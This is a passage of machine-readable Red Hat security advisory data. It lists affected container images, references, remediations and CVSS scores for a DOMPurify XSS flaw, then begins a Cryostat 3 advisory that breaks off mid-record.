"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45801", }, { category: "external", summary: "RHBZ#2312631", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2312631", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45801", url: "https://www.cve.org/CVERecord?id=CVE-2024-45801", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45801", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45801", }, { category: "external", summary: "https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21", url: "https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21", }, { category: "external", summary: "https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc", url: "https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc", }, { category: "external", summary: "https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674", url: "https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674", }, ], release_date: "2024-09-16T19:16:11.080000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-22T01:05:39+00:00", details: "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 7, baseSeverity: "HIGH", confidentialityImpact: "LOW", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L", version: "3.1", }, products: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "dompurify: XSS vulnerability via prototype pollution", }, ], }
rhsa-2024_7706
Vulnerability from csaf_redhat
Published
2024-10-07 01:12
Modified
2024-12-17 19:02
Summary
Red Hat Security Advisory: Red Hat build of Cryostat security update
Notes
Topic
An update is now available for the Red Hat build of Cryostat 3 on RHEL 8.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
An update is now available for the Red Hat build of Cryostat 3 on RHEL 8.
Security Fix(es):
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)
* dompurify: XSS vulnerability via prototype pollution (CVE-2024-45801)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Moderate", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "An update is now available for the Red Hat build of Cryostat 3 on RHEL 8.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", title: "Topic", }, { category: "general", text: "An update is now available for the Red Hat build of Cryostat 3 on RHEL 8.\n\nSecurity Fix(es):\n\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)\n* dompurify: XSS vulnerability via prototype pollution (CVE-2024-45801)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2024:7706", url: "https://access.redhat.com/errata/RHSA-2024:7706", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#moderate", url: "https://access.redhat.com/security/updates/classification/#moderate", }, { category: "external", summary: "2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "2312631", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2312631", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7706.json", }, ], title: "Red Hat Security Advisory: Red Hat build of Cryostat security update", tracking: { current_release_date: "2024-12-17T19:02:22+00:00", generator: { date: "2024-12-17T19:02:22+00:00", engine: { name: "Red Hat SDEngine", version: "4.2.3", }, }, id: "RHSA-2024:7706", initial_release_date: "2024-10-07T01:12:29+00:00", revision_history: [ { date: "2024-10-07T01:12:29+00:00", number: "1", summary: "Initial version", }, { date: "2024-10-07T01:12:29+00:00", number: "2", summary: "Last updated version", }, { date: "2024-12-17T19:02:22+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "Cryostat 3 on RHEL 8", product: { name: "Cryostat 3 on RHEL 8", product_id: "8Base-Cryostat-3", product_identification_helper: { cpe: "cpe:/a:redhat:cryostat:3::el8", }, }, }, ], category: "product_family", name: "Cryostat", }, { branches: [ { category: "product_version", name: "cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", product: { name: "cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", product_id: "cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64", product_identification_helper: { purl: "pkg:oci/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a?arch=arm64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-db-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", product: { name: "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", product_id: "cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64", product_identification_helper: { purl: "pkg:oci/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3?arch=arm64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-grafana-dashboard-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", product: { name: "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", product_id: "cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64", product_identification_helper: { purl: "pkg:oci/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f?arch=arm64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", product: { name: "cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", product_id: "cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64", product_identification_helper: { purl: "pkg:oci/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6?arch=arm64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-reports-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", product: { name: "cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", product_id: "cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64", product_identification_helper: { purl: "pkg:oci/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b?arch=arm64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-rhel8&tag=3.0.1-3", }, }, }, { category: "product_version", name: "cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", product: { name: "cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", product_id: "cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64", product_identification_helper: { purl: "pkg:oci/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51?arch=arm64&repository_url=registry.redhat.io/cryostat-tech-preview/cryostat-operator-bundle&tag=3.0.1-3", }, }, }, { category: "product_version", name: 